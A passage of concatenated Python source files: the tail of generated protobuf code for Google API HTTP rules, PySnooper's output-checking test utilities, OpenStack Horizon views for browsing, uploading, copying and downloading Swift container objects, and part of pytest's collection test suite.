_HTTPRULE.fields_by_name['get'])
_HTTPRULE.fields_by_name['get'].containing_oneof = _HTTPRULE.oneofs_by_name['pattern']
_HTTPRULE.oneofs_by_name['pattern'].fields.append(
_HTTPRULE.fields_by_name['put'])
_HTTPRULE.fields_by_name['put'].containing_oneof = _HTTPRULE.oneofs_by_name['pattern']
_HTTPRULE.oneofs_by_name['pattern'].fields.append(
_HTTPRULE.fields_by_name['post'])
_HTTPRULE.fields_by_name['post'].containing_oneof = _HTTPRULE.oneofs_by_name['pattern']
_HTTPRULE.oneofs_by_name['pattern'].fields.append(
_HTTPRULE.fields_by_name['delete'])
_HTTPRULE.fields_by_name['delete'].containing_oneof = _HTTPRULE.oneofs_by_name['pattern']
_HTTPRULE.oneofs_by_name['pattern'].fields.append(
_HTTPRULE.fields_by_name['patch'])
_HTTPRULE.fields_by_name['patch'].containing_oneof = _HTTPRULE.oneofs_by_name['pattern']
_HTTPRULE.oneofs_by_name['pattern'].fields.append(
_HTTPRULE.fields_by_name['custom'])
_HTTPRULE.fields_by_name['custom'].containing_oneof = _HTTPRULE.oneofs_by_name['pattern']
DESCRIPTOR.message_types_by_name['Http'] = _HTTP
DESCRIPTOR.message_types_by_name['HttpRule'] = _HTTPRULE
DESCRIPTOR.message_types_by_name['CustomHttpPattern'] = _CUSTOMHTTPPATTERN
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Http = _reflection.GeneratedProtocolMessageType('Http', (_message.Message,), dict(
DESCRIPTOR = _HTTP,
__module__ = 'google.api.http_pb2'
# @@protoc_insertion_point(class_scope:google.api.Http)
))
_sym_db.RegisterMessage(Http)
HttpRule = _reflection.GeneratedProtocolMessageType('HttpRule', (_message.Message,), dict(
DESCRIPTOR = _HTTPRULE,
__module__ = 'google.api.http_pb2'
# @@protoc_insertion_point(class_scope:google.api.HttpRule)
))
_sym_db.RegisterMessage(HttpRule)
CustomHttpPattern = _reflection.GeneratedProtocolMessageType('CustomHttpPattern', (_message.Message,), dict(
DESCRIPTOR = _CUSTOMHTTPPATTERN,
__module__ = 'google.api.http_pb2'
# @@protoc_insertion_point(class_scope:google.api.CustomHttpPattern)
))
_sym_db.RegisterMessage(CustomHttpPattern)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
|
# Copyright 2019 Ram Rachum and collaborators.
# This program is distributed under the MIT license.
import os
import re
import abc
import inspect
import sys
from pysnooper.utils import DEFAULT_REPR_RE
try:
from itertools import zip_longest
except ImportError:
from itertools import izip_longest as zip_longest
from . import mini_toolbox
import pysnooper.pycompat
def get_function_arguments(function, exclude=()):
try:
getfullargspec = inspect.getfullargspec
except AttributeError:
result = inspect.getargspec(function).args
else:
result = getfullargspec(function).args
for exclude_item in exclude:
result.remove(exclude_item)
return result
class _BaseEntry(pysnooper.pycompat.ABC):
def __init__(self, prefix='', min_python_version=None, max_python_version=None):
self.prefix = prefix
self.min_python_version = min_python_version
self.max_python_version = max_python_version
@abc.abstractmethod
def check(self, s):
pass
def is_compatible_with_current_python_version(self):
compatible = True
if self.min_python_version and self.min_python_version > sys.version_info:
compatible = False
if self.max_python_version and self.max_python_version < sys.version_info:
compatible = False
return compatible
def __repr__(self):
init_arguments = get_function_arguments(self.__init__,
exclude=('self',))
attributes = {
key: repr(getattr(self, key)) for key in init_arguments
if getattr(self, key) is not None
}
return '%s(%s)' % (
type(self).__name__,
', '.join('{key}={value}'.format(**locals()) for key, value
in attributes.items())
)
class _BaseValueEntry(_BaseEntry):
def __init__(self, prefix='', min_python_version=None,
max_python_version=None):
_BaseEntry.__init__(self, prefix=prefix,
min_python_version=min_python_version,
max_python_version=max_python_version)
self.line_pattern = re.compile(
r"""^%s(?P<indent>(?: {4})*)(?P<preamble>[^:]*):"""
r"""\.{2,7} (?P<content>.*)$""" % (re.escape(self.prefix),)
)
@abc.abstractmethod
def _check_preamble(self, preamble):
pass
@abc.abstractmethod
def _check_content(self, preamble):
pass
def check(self, s):
match = self.line_pattern.match(s)
if not match:
return False
_, preamble, content = match.groups()
return (self._check_preamble(preamble) and
self._check_content(content))
class ElapsedTimeEntry(_BaseEntry):
def __init__(self, elapsed_time_value=None, tolerance=0.2, prefix='',
min_python_version=None, max_python_version=None):
_BaseEntry.__init__(self, prefix=prefix,
min_python_version=min_python_version,
max_python_version=max_python_version)
self.line_pattern = re.compile(
r"""^%s(?P<indent>(?: {4})*)Elapsed time: (?P<time>.*)""" % (
re.escape(self.prefix),
)
)
self.elapsed_time_value = elapsed_time_value
self.tolerance = tolerance
def check(self, s):
match = self.line_pattern.match(s)
if not match:
return False
timedelta = pysnooper.pycompat.timedelta_parse(match.group('time'))
if self.elapsed_time_value:
return abs(timedelta.total_seconds() - self.elapsed_time_value) \
<= self.tolerance
else:
return True
class CallEndedByExceptionEntry(_BaseEntry):
# Todo: Looking at this class, we could rework the hierarchy.
def __init__(self, prefix=''):
_BaseEntry.__init__(self, prefix=prefix)
def check(self, s):
return re.match(
r'''(?P<indent>(?: {4})*)Call ended by exception''',
s
)
class VariableEntry(_BaseValueEntry):
def __init__(self, name=None, value=None, stage=None, prefix='',
name_regex=None, value_regex=None, min_python_version=None,
max_python_version=None):
_BaseValueEntry.__init__(self, prefix=prefix,
min_python_version=min_python_version,
max_python_version=max_python_version)
if name is not None:
assert name_regex is None
if value is not None:
assert value_regex is None
assert stage in (None, 'starting', 'new', 'modified')
self.name = name
self.value = value
self.stage = stage
self.name_regex = (None if name_regex is None else
re.compile(name_regex))
self.value_regex = (None if value_regex is None else
re.compile(value_regex))
_preamble_pattern = re.compile(
r"""^(?P<stage>New|Modified|Starting) var$"""
)
def _check_preamble(self, preamble):
match = self._preamble_pattern.match(preamble)
if not match:
return False
stage = match.group('stage')
return self._check_stage(stage)
_content_pattern = re.compile(
r"""^(?P<name>.+?) = (?P<value>.+)$"""
)
def _check_content(self, content):
match = self._content_pattern.match(content)
if not match:
return False
name, value = match.groups()
return self._check_name(name) and self._check_value(value)
def _check_name(self, name):
if self.name is not None:
return name == self.name
elif self.name_regex is not None:
return self.name_regex.match(name)
else:
return True
def _check_value(self, value):
if self.value is not None:
return value == self.value
elif self.value_regex is not None:
return self.value_regex.match(value)
else:
return True
def _check_stage(self, stage):
stage = stage.lower()
if self.stage is None:
return stage in ('starting', 'new', 'modified')
else:
return stage == self.stage
class _BaseSimpleValueEntry(_BaseValueEntry):
def __init__(self, value=None, value_regex=None, prefix='',
min_python_version=None, max_python_version=None):
_BaseValueEntry.__init__(self, prefix=prefix,
min_python_version=min_python_version,
max_python_version=max_python_version)
if value is not None:
assert value_regex is None
self.value = value
self.value_regex = (None if value_regex is None else
re.compile(value_regex))
def _check_preamble(self, preamble):
return bool(self._preamble_pattern.match(preamble))
def _check_content(self, content):
return self._check_value(content)
def _check_value(self, value):
if self.value is not None:
return value == self.value
elif self.value_regex is not None:
return self.value_regex.match(value)
else:
return True
class ReturnValueEntry(_BaseSimpleValueEntry):
_preamble_pattern = re.compile(
r"""^Return value$"""
)
class ExceptionValueEntry(_BaseSimpleValueEntry):
_preamble_pattern = re.compile(
r"""^Exception$"""
)
class SourcePathEntry(_BaseValueEntry):
def __init__(self, source_path=None, source_path_regex=None, prefix=''):
_BaseValueEntry.__init__(self, prefix=prefix)
if source_path is not None:
assert source_path_regex is None
self.source_path = source_path
self.source_path_regex = (None if source_path_regex is None else
re.compile(source_path_regex))
_preamble_pattern = re.compile(
r"""^Source path$"""
)
def _check_preamble(self, preamble):
return bool(self._preamble_pattern.match(preamble))
def _check_content(self, source_path):
if self.source_path is not None:
return source_path == self.source_path
elif self.source_path_regex is not None:
return self.source_path_regex.match(source_path)
else:
return True
class _BaseEventEntry(_BaseEntry):
def __init__(self, source=None, source_regex=None, thread_info=None,
thread_info_regex=None, prefix='', min_python_version=None,
max_python_version=None):
_BaseEntry.__init__(self, prefix=prefix,
min_python_version=min_python_version,
max_python_version=max_python_version)
if type(self) is _BaseEventEntry:
raise TypeError
if source is not None:
assert source_regex is None
self.line_pattern = re.compile(
r"""^%s(?P<indent>(?: {4})*)(?:(?:[0-9:.]{15})|(?: {15})) """
r"""(?P<thread_info>[0-9]+-[0-9A-Za-z_-]+[ ]+)?"""
r"""(?P<event_name>[a-z_]*) +(?P<line_number>[0-9]*) """
r"""+(?P<source>.*)$""" % (re.escape(self.prefix,))
)
self.source = source
self.source_regex = (None if source_regex is None else
re.compile(source_regex))
self.thread_info = thread_info
self.thread_info_regex = (None if thread_info_regex is None else
re.compile(thread_info_regex))
@property
def event_name(self):
return re.match('^[A-Z][a-z_]*', type(self).__name__).group(0).lower()
def _check_source(self, source):
if self.source is not None:
return source == self.source
elif self.source_regex is not None:
return self.source_regex.match(source)
else:
return True
def _check_thread_info(self, thread_info):
if self.thread_info is not None:
return thread_info == self.thread_info
elif self.thread_info_regex is not None:
return self.thread_info_regex.match(thread_info)
else:
return True
def check(self, s):
match = self.line_pattern.match(s)
if not match:
return False
_, thread_info, event_name, _, source = match.groups()
return (event_name == self.event_name and
self._check_source(source) and
self._check_thread_info(thread_info))
class CallEntry(_BaseEventEntry):
pass
class LineEntry(_BaseEventEntry):
pass
class ReturnEntry(_BaseEventEntry):
pass
class ExceptionEntry(_BaseEventEntry):
pass
class OpcodeEntry(_BaseEventEntry):
pass
class OutputFailure(Exception):
pass
def verify_normalize(lines, prefix):
time_re = re.compile(r"[0-9:.]{15}")
src_re = re.compile(r'^(?: *)Source path:\.\.\. (.*)$')
for line in lines:
if DEFAULT_REPR_RE.search(line):
msg = "normalize is active, memory address should not appear"
raise OutputFailure(line, msg)
no_prefix = line.replace(prefix if prefix else '', '').strip()
if time_re.match(no_prefix):
msg = "normalize is active, time should not appear"
raise OutputFailure(line, msg)
m = src_re.match(line)
if m:
if not os.path.basename(m.group(1)) == m.group(1):
msg = "normalize is active, path should be only basename"
raise OutputFailure(line, msg)
def assert_output(output, expected_entries, prefix=None, normalize=False):
lines = tuple(filter(None, output.split('\n')))
if expected_entries and not lines:
raise OutputFailure("Output is empty")
if prefix is not None:
for line in lines:
if not line.startswith(prefix):
raise OutputFailure(line)
if normalize:
verify_normalize(lines, prefix)
# Filter only entries compatible with the current Python
filtered_expected_entries = []
for expected_entry in expected_entries:
if isinstance(expected_entry, _BaseEntry):
if expected_entry.is_compatible_with_current_python_version():
filtered_expected_entries.append(expected_entry)
else:
filtered_expected_entries.append(expected_entry)
expected_entries_count = len(filtered_expected_entries)
any_mismatch = False
result = ''
template = u'\n{line!s:%s} {expected_entry} {arrow}' % max(map(len, lines))
for expected_entry, line in zip_longest(filtered_expected_entries, lines, fillvalue=""):
mismatch = not (expected_entry and expected_entry.check(line))
any_mismatch |= mismatch
arrow = '<===' * mismatch
result += template.format(**locals())
if len(lines) != expected_entries_count:
result += '\nOutput has {} lines, while we expect {} lines.'.format(
len(lines), len(expected_entries))
if any_mismatch:
raise OutputFailure(result)
def assert_sample_output(module):
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
module.main()
placeholder_time = '00:00:00.000000'
time_pattern = '[0-9:.]{15}'
def normalise(out):
out = re.sub(time_pattern, placeholder_time, out).strip()
out = re.sub(
r'^( *)Source path:\.\.\. .*$',
r'\1Source path:... Whatever',
out,
flags=re.MULTILINE
)
return out
output = output_capturer.string_io.getvalue()
try:
assert (
normalise(output) ==
normalise(module.expected_output)
)
except AssertionError:
print('\n\nActual Output:\n\n' + output) # to copy paste into expected_output
raise # show pytest diff (may need -vv flag to see in full)
|
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Views for managing Swift containers.
"""
import os
from django.core.urlresolvers import reverse
from django import http
from django.utils.functional import cached_property # noqa
from django.utils.translation import ugettext_lazy as _
from django.views import generic
import six
from horizon import browsers
from horizon import exceptions
from horizon import forms
from horizon.utils import memoized
from openstack_dashboard import api
from openstack_dashboard.api import swift
from openstack_dashboard.dashboards.project.containers \
import browsers as project_browsers
from openstack_dashboard.dashboards.project.containers \
import forms as project_forms
from openstack_dashboard.dashboards.project.containers import utils
class NgIndexView(generic.TemplateView):
template_name = 'project/containers/ngindex.html'
class ContainerView(browsers.ResourceBrowserView):
browser_class = project_browsers.ContainerBrowser
template_name = "project/containers/index.html"
page_title = _("Containers")
def get_containers_data(self):
containers = []
self._more = None
marker = self.request.GET.get('marker', None)
try:
containers, self._more = api.swift.swift_get_containers(
self.request, marker=marker)
except Exception:
msg = _('Unable to retrieve container list.')
exceptions.handle(self.request, msg)
return containers
@cached_property
def objects(self):
"""Returns a list of objects given the subfolder's path.
The path is from the kwargs of the request.
"""
objects = []
self._more = None
marker = self.request.GET.get('marker', None)
container_name = self.kwargs['container_name']
subfolder = self.kwargs['subfolder_path']
prefix = None
if container_name:
self.navigation_selection = True
if subfolder:
prefix = subfolder
try:
objects, self._more = api.swift.swift_get_objects(
self.request,
container_name,
marker=marker,
prefix=prefix)
except Exception:
self._more = None
objects = []
msg = _('Unable to retrieve object list.')
exceptions.handle(self.request, msg)
return objects
def is_subdir(self, item):
content_type = "application/pseudo-folder"
return getattr(item, "content_type", None) == content_type
def is_placeholder(self, item):
object_name = getattr(item, "name", "")
return object_name.endswith(api.swift.FOLDER_DELIMITER)
def get_objects_data(self):
"""Returns a list of objects within the current folder."""
filtered_objects = [item for item in self.objects
if (not self.is_subdir(item) and
not self.is_placeholder(item))]
return filtered_objects
def get_subfolders_data(self):
"""Returns a list of subfolders within the current folder."""
filtered_objects = [item for item in self.objects
if self.is_subdir(item)]
return filtered_objects
def get_context_data(self, **kwargs):
context = super(ContainerView, self).get_context_data(**kwargs)
context['container_name'] = self.kwargs["container_name"]
context['subfolders'] = []
if self.kwargs["subfolder_path"]:
(parent, slash, folder) = self.kwargs["subfolder_path"] \
.strip('/').rpartition('/')
while folder:
path = "%s%s%s/" % (parent, slash, folder)
context['subfolders'].insert(0, (folder, path))
(parent, slash, folder) = parent.rpartition('/')
return context
class CreateView(forms.ModalFormView):
form_class = project_forms.CreateContainer
template_name = 'project/containers/create.html'
success_url = "horizon:project:containers:index"
page_title = _("Create Container")
def get_success_url(self):
parent = self.request.POST.get('parent', None)
if parent:
container, slash, remainder = parent.partition(
swift.FOLDER_DELIMITER)
args = (utils.wrap_delimiter(container),
utils.wrap_delimiter(remainder))
return reverse(self.success_url, args=args)
else:
container = utils.wrap_delimiter(self.request.POST['name'])
return reverse(self.success_url, args=[container])
def get_initial(self):
initial = super(CreateView, self).get_initial()
initial['parent'] = self.kwargs['container_name']
return initial
class CreatePseudoFolderView(forms.ModalFormView):
form_class = project_forms.CreatePseudoFolder
template_name = 'project/containers/create_pseudo_folder.html'
success_url = "horizon:project:containers:index"
page_title = _("Create Pseudo-folder")
def get_success_url(self):
container_name = self.request.POST['container_name']
return reverse(self.success_url,
args=(utils.wrap_delimiter(container_name),
self.request.POST.get('path', '')))
def get_initial(self):
return {"container_name": self.kwargs["container_name"],
"path": self.kwargs['subfolder_path']}
def get_context_data(self, **kwargs):
context = super(CreatePseudoFolderView, self). \
get_context_data(**kwargs)
context['container_name'] = self.kwargs["container_name"]
return context
class UploadView(forms.ModalFormView):
form_class = project_forms.UploadObject
template_name = 'project/containers/upload.html'
success_url = "horizon:project:containers:index"
page_title = _("Upload Objects")
def get_success_url(self):
container = utils.wrap_delimiter(self.request.POST['container_name'])
path = utils.wrap_delimiter(self.request.POST.get('path', ''))
args = (container, path)
return reverse(self.success_url, args=args)
def get_initial(self):
return {"container_name": self.kwargs["container_name"],
"path": self.kwargs['subfolder_path']}
def get_context_data(self, **kwargs):
context = super(UploadView, self).get_context_data(**kwargs)
context['container_name'] = self.kwargs["container_name"]
return context
def object_download(request, container_name, object_path):
try:
obj = api.swift.swift_get_object(request, container_name, object_path,
resp_chunk_size=swift.CHUNK_SIZE)
except Exception:
redirect = reverse("horizon:project:containers:index")
exceptions.handle(request,
_("Unable to retrieve object."),
redirect=redirect)
# Add the original file extension back on if it wasn't preserved in the
# name given to the object.
filename = object_path.rsplit(swift.FOLDER_DELIMITER)[-1]
if not os.path.splitext(obj.name)[1] and obj.orig_name:
name, ext = os.path.splitext(obj.orig_name)
filename = "%s%s" % (filename, ext)
response = http.StreamingHttpResponse(obj.data)
safe_name = filename.replace(",", "")
if six.PY2:
safe_name = safe_name.encode('utf-8')
response['Content-Disposition'] = 'attachment; filename="%s"' % safe_name
response['Content-Type'] = 'application/octet-stream'
response['Content-Length'] = obj.bytes
return response
class CopyView(forms.ModalFormView):
form_class = project_forms.CopyObject
template_name = 'project/containers/copy.html'
success_url = "horizon:project:containers:index"
page_title = _("Copy Object")
def get_success_url(self):
container = utils.wrap_delimiter(
self.request.POST['new_container_name'])
path = utils.wrap_delimiter(self.request.POST.get('path', ''))
args = (container, path)
return reverse(self.success_url, args=args)
def get_form_kwargs(self):
kwargs = super(CopyView, self).get_form_kwargs()
try:
containers = api.swift.swift_get_containers(self.request)
except Exception:
redirect = reverse("horizon:project:containers:index")
exceptions.handle(self.request,
_('Unable to list containers.'),
redirect=redirect)
kwargs['containers'] = [(c.name, c.name) for c in containers[0]]
return kwargs
@staticmethod
def get_copy_name(object_name):
filename, ext = os.path.splitext(object_name)
return "%s.copy%s" % (filename, ext)
def get_initial(self):
path = self.kwargs["subfolder_path"]
object_name = self.kwargs["object_name"]
orig = "%s%s" % (path or '', object_name)
return {"new_container_name": self.kwargs["container_name"],
"orig_container_name": self.kwargs["container_name"],
"orig_object_name": orig,
"path": path,
"new_object_name": self.get_copy_name(object_name)}
def get_context_data(self, **kwargs):
context = super(CopyView, self).get_context_data(**kwargs)
context['container_name'] = self.kwargs["container_name"]
context['object_name'] = self.kwargs["object_name"]
return context
class ContainerDetailView(forms.ModalFormMixin, generic.TemplateView):
template_name = 'project/containers/container_detail.html'
page_title = _("Container Details")
@memoized.memoized_method
def get_object(self):
try:
return api.swift.swift_get_container(
self.request,
self.kwargs["container_name"],
with_data=False)
except Exception:
redirect = reverse("horizon:project:containers:index")
exceptions.handle(self.request,
_('Unable to retrieve details.'),
redirect=redirect)
def get_context_data(self, **kwargs):
context = super(ContainerDetailView, self).get_context_data(**kwargs)
context['container'] = self.get_object()
return context
class ObjectDetailView(forms.ModalFormMixin, generic.TemplateView):
template_name = 'project/containers/object_detail.html'
page_title = _("Object Details")
@memoized.memoized_method
def get_object(self):
try:
return api.swift.swift_get_object(
self.request,
self.kwargs["container_name"],
self.kwargs["object_path"],
with_data=False)
except Exception:
redirect = reverse("horizon:project:containers:index")
exceptions.handle(self.request,
_('Unable to retrieve details.'),
redirect=redirect)
def get_context_data(self, **kwargs):
context = super(ObjectDetailView, self).get_context_data(**kwargs)
context['object'] = self.get_object()
return context
class UpdateObjectView(forms.ModalFormView):
form_class = project_forms.UpdateObject
template_name = 'project/containers/update.html'
success_url = "horizon:project:containers:index"
page_title = _("Update Object")
def get_success_url(self):
container = utils.wrap_delimiter(self.request.POST['container_name'])
path = utils.wrap_delimiter(self.request.POST.get('path', ''))
args = (container, path)
return reverse(self.success_url, args=args)
def get_initial(self):
return {"container_name": self.kwargs["container_name"],
"path": self.kwargs["subfolder_path"],
"name": self.kwargs["object_name"]}
def get_context_data(self, **kwargs):
context = super(UpdateObjectView, self).get_context_data(**kwargs)
context['container_name'] = self.kwargs["container_name"]
context['subfolder_path'] = self.kwargs["subfolder_path"]
context['object_name'] = self.kwargs["object_name"]
return context
|
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import pprint
import sys
import textwrap
import py
import pytest
from _pytest.main import _in_venv
from _pytest.main import EXIT_INTERRUPTED
from _pytest.main import EXIT_NOTESTSCOLLECTED
from _pytest.main import Session
class TestCollector(object):
def test_collect_versus_item(self):
from pytest import Collector, Item
assert not issubclass(Collector, Item)
assert not issubclass(Item, Collector)
def test_check_equality(self, testdir):
modcol = testdir.getmodulecol(
"""
def test_pass(): pass
def test_fail(): assert 0
"""
)
fn1 = testdir.collect_by_name(modcol, "test_pass")
assert isinstance(fn1, pytest.Function)
fn2 = testdir.collect_by_name(modcol, "test_pass")
assert isinstance(fn2, pytest.Function)
assert fn1 == fn2
assert fn1 != modcol
if sys.version_info < (3, 0):
assert cmp(fn1, fn2) == 0 # NOQA
assert hash(fn1) == hash(fn2)
fn3 = testdir.collect_by_name(modcol, "test_fail")
assert isinstance(fn3, pytest.Function)
assert not (fn1 == fn3)
assert fn1 != fn3
for fn in fn1, fn2, fn3:
assert fn != 3
assert fn != modcol
assert fn != [1, 2, 3]
assert [1, 2, 3] != fn
assert modcol != fn
def test_getparent(self, testdir):
modcol = testdir.getmodulecol(
"""
class TestClass(object):
def test_foo():
pass
"""
)
cls = testdir.collect_by_name(modcol, "TestClass")
fn = testdir.collect_by_name(testdir.collect_by_name(cls, "()"), "test_foo")
parent = fn.getparent(pytest.Module)
assert parent is modcol
parent = fn.getparent(pytest.Function)
assert parent is fn
parent = fn.getparent(pytest.Class)
assert parent is cls
def test_getcustomfile_roundtrip(self, testdir):
hello = testdir.makefile(".xxx", hello="world")
testdir.makepyfile(
conftest="""
import pytest
class CustomFile(pytest.File):
pass
def pytest_collect_file(path, parent):
if path.ext == ".xxx":
return CustomFile(path, parent=parent)
"""
)
node = testdir.getpathnode(hello)
assert isinstance(node, pytest.File)
assert node.name == "hello.xxx"
nodes = node.session.perform_collect([node.nodeid], genitems=False)
assert len(nodes) == 1
assert isinstance(nodes[0], pytest.File)
def test_can_skip_class_with_test_attr(self, testdir):
"""Assure test class is skipped when using `__test__=False` (See #2007)."""
testdir.makepyfile(
"""
class TestFoo(object):
__test__ = False
def __init__(self):
pass
def test_foo():
assert True
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["collected 0 items", "*no tests ran in*"])
class TestCollectFS(object):
def test_ignored_certain_directories(self, testdir):
tmpdir = testdir.tmpdir
tmpdir.ensure("build", "test_notfound.py")
tmpdir.ensure("dist", "test_notfound.py")
tmpdir.ensure("_darcs", "test_notfound.py")
tmpdir.ensure("CVS", "test_notfound.py")
tmpdir.ensure("{arch}", "test_notfound.py")
tmpdir.ensure(".whatever", "test_notfound.py")
tmpdir.ensure(".bzr", "test_notfound.py")
tmpdir.ensure("normal", "test_found.py")
for x in tmpdir.visit("test_*.py"):
x.write("def test_hello(): pass")
result = testdir.runpytest("--collect-only")
s = result.stdout.str()
assert "test_notfound" not in s
assert "test_found" in s
@pytest.mark.parametrize(
"fname",
(
"activate",
"activate.csh",
"activate.fish",
"Activate",
"Activate.bat",
"Activate.ps1",
),
)
def test_ignored_virtualenvs(self, testdir, fname):
bindir = "Scripts" if sys.platform.startswith("win") else "bin"
testdir.tmpdir.ensure("virtual", bindir, fname)
testfile = testdir.tmpdir.ensure("virtual", "test_invenv.py")
testfile.write("def test_hello(): pass")
# by default, ignore tests inside a virtualenv
result = testdir.runpytest()
assert "test_invenv" not in result.stdout.str()
# allow test collection if user insists
result = testdir.runpytest("--collect-in-virtualenv")
assert "test_invenv" in result.stdout.str()
# allow test collection if user directly passes in the directory
result = testdir.runpytest("virtual")
assert "test_invenv" in result.stdout.str()
@pytest.mark.parametrize(
"fname",
(
"activate",
"activate.csh",
"activate.fish",
"Activate",
"Activate.bat",
"Activate.ps1",
),
)
def test_ignored_virtualenvs_norecursedirs_precedence(self, testdir, fname):
bindir = "Scripts" if sys.platform.startswith("win") else "bin"
# norecursedirs takes priority
testdir.tmpdir.ensure(".virtual", bindir, fname)
testfile = testdir.tmpdir.ensure(".virtual", "test_invenv.py")
testfile.write("def test_hello(): pass")
result = testdir.runpytest("--collect-in-virtualenv")
assert "test_invenv" not in result.stdout.str()
# ...unless the virtualenv is explicitly given on the CLI
result = testdir.runpytest("--collect-in-virtualenv", ".virtual")
assert "test_invenv" in result.stdout.str()
@pytest.mark.parametrize(
"fname",
(
"activate",
"activate.csh",
"activate.fish",
"Activate",
"Activate.bat",
"Activate.ps1",
),
)
def test__in_venv(self, testdir, fname):
"""Directly test the virtual env detection function"""
bindir = "Scripts" if sys.platform.startswith("win") else "bin"
# no bin/activate, not a virtualenv
base_path = testdir.tmpdir.mkdir("venv")
assert _in_venv(base_path) is False
# with bin/activate, totally a virtualenv
base_path.ensure(bindir, fname)
assert _in_venv(base_path) is True
def test_custom_norecursedirs(self, testdir):
testdir.makeini(
"""
[pytest]
norecursedirs = mydir xyz*
"""
)
tmpdir = testdir.tmpdir
tmpdir.ensure("mydir", "test_hello.py").write("def test_1(): pass")
tmpdir.ensure("xyz123", "test_2.py").write("def test_2(): 0/0")
tmpdir.ensure("xy", "test_ok.py").write("def test_3(): pass")
rec = testdir.inline_run()
rec.assertoutcome(passed=1)
rec = testdir.inline_run("xyz123/test_2.py")
rec.assertoutcome(failed=1)
def test_testpaths_ini(self, testdir, monkeypatch):
testdir.makeini(
"""
[pytest]
testpaths = gui uts
"""
)
tmpdir = testdir.tmpdir
tmpdir.ensure("env", "test_1.py").write("def test_env(): pass")
tmpdir.ensure("gui", "test_2.py").write("def test_gui(): pass")
tmpdir.ensure("uts", "test_3.py").write("def test_uts(): pass")
# executing from rootdir only tests from `testpaths` directories
# are collected
items, reprec = testdir.inline_genitems("-v")
assert [x.name for x in items] == ["test_gui", "test_uts"]
# check that explicitly passing directories in the command-line
# collects the tests
for dirname in ("env", "gui", "uts"):
items, reprec = testdir.inline_genitems(tmpdir.join(dirname))
assert [x.name for x in items] == ["test_%s" % dirname]
# changing cwd to each subdirectory and running pytest without
# arguments collects the tests in that directory normally
for dirname in ("env", "gui", "uts"):
monkeypatch.chdir(testdir.tmpdir.join(dirname))
items, reprec = testdir.inline_genitems()
assert [x.name for x in items] == ["test_%s" % dirname]
class TestCollectPluginHookRelay(object):
def test_pytest_collect_file(self, testdir):
wascalled = []
class Plugin(object):
def pytest_collect_file(self, path, parent):
if not path.basename.startswith("."):
# Ignore hidden files, e.g. .testmondata.
wascalled.append(path)
testdir.makefile(".abc", "xyz")
pytest.main([testdir.tmpdir], plugins=[Plugin()])
assert len(wascalled) == 1
assert wascalled[0].ext == ".abc"
def test_pytest_collect_directory(self, testdir):
wascalled = []
class Plugin(object):
def pytest_collect_directory(self, path, parent):
wascalled.append(path.basename)
testdir.mkdir("hello")
testdir.mkdir("world")
pytest.main(testdir.tmpdir, plugins=[Plugin()])
assert "hello" in wascalled
assert "world" in wascalled
class TestPrunetraceback(object):
def test_custom_repr_failure(self, testdir):
p = testdir.makepyfile(
"""
import not_exists
"""
)
testdir.makeconftest(
"""
import pytest
def pytest_collect_file(path, parent):
return MyFile(path, parent)
class MyError(Exception):
pass
class MyFile(pytest.File):
def collect(self):
raise MyError()
def repr_failure(self, excinfo):
if excinfo.errisinstance(MyError):
return "hello world"
return pytest.File.repr_failure(self, excinfo)
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*ERROR collecting*", "*hello world*"])
@pytest.mark.xfail(reason="other mechanism for adding to reporting needed")
def test_collect_report_postprocessing(self, testdir):
p = testdir.makepyfile(
"""
import not_exists
"""
)
testdir.makeconftest(
"""
import pytest
@pytest.hookimpl(hookwrapper=True)
def pytest_make_collect_report():
outcome = yield
rep = outcome.get_result()
rep.headerlines += ["header1"]
outcome.force_result(rep)
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*ERROR collecting*", "*header1*"])
class TestCustomConftests(object):
def test_ignore_collect_path(self, testdir):
testdir.makeconftest(
"""
def pytest_ignore_collect(path, config):
return path.basename.startswith("x") or \
path.basename == "test_one.py"
"""
)
sub = testdir.mkdir("xy123")
sub.ensure("test_hello.py").write("syntax error")
sub.join("conftest.py").write("syntax error")
testdir.makepyfile("def test_hello(): pass")
testdir.makepyfile(test_one="syntax error")
result = testdir.runpytest("--fulltrace")
assert result.ret == 0
result.stdout.fnmatch_lines(["*1 passed*"])
def test_ignore_collect_not_called_on_argument(self, testdir):
testdir.makeconftest(
"""
def pytest_ignore_collect(path, config):
return True
"""
)
p = testdir.makepyfile("def test_hello(): pass")
result = testdir.runpytest(p)
assert result.ret == 0
result.stdout.fnmatch_lines(["*1 passed*"])
result = testdir.runpytest()
assert result.ret == EXIT_NOTESTSCOLLECTED
result.stdout.fnmatch_lines(["*collected 0 items*"])
def test_collectignore_exclude_on_option(self, testdir):
testdir.makeconftest(
"""
collect_ignore = ['hello', 'test_world.py']
def pytest_addoption(parser):
parser.addoption("--XX", action="store_true", default=False)
def pytest_configure(config):
if config.getvalue("XX"):
collect_ignore[:] = []
"""
)
testdir.mkdir("hello")
testdir.makepyfile(test_world="def test_hello(): pass")
result = testdir.runpytest()
assert result.ret == EXIT_NOTESTSCOLLECTED
assert "passed" not in result.stdout.str()
result = testdir.runpytest("--XX")
assert result.ret == 0
assert "passed" in result.stdout.str()
def test_collectignoreglob_exclude_on_option(self, testdir):
testdir.makeconftest(
"""
collect_ignore_glob = ['*w*l[dt]*']
def pytest_addoption(parser):
parser.addoption("--XX", action="store_true", default=False)
def pytest_configure(config):
if config.getvalue("XX"):
collect_ignore_glob[:] = []
"""
)
testdir.makepyfile(test_world="def test_hello(): pass")
testdir.makepyfile(test_welt="def test_hallo(): pass")
result = testdir.runpytest()
assert result.ret == EXIT_NOTESTSCOLLECTED
result.stdout.fnmatch_lines(["*collected 0 items*"])
result = testdir.runpytest("--XX")
assert result.ret == 0
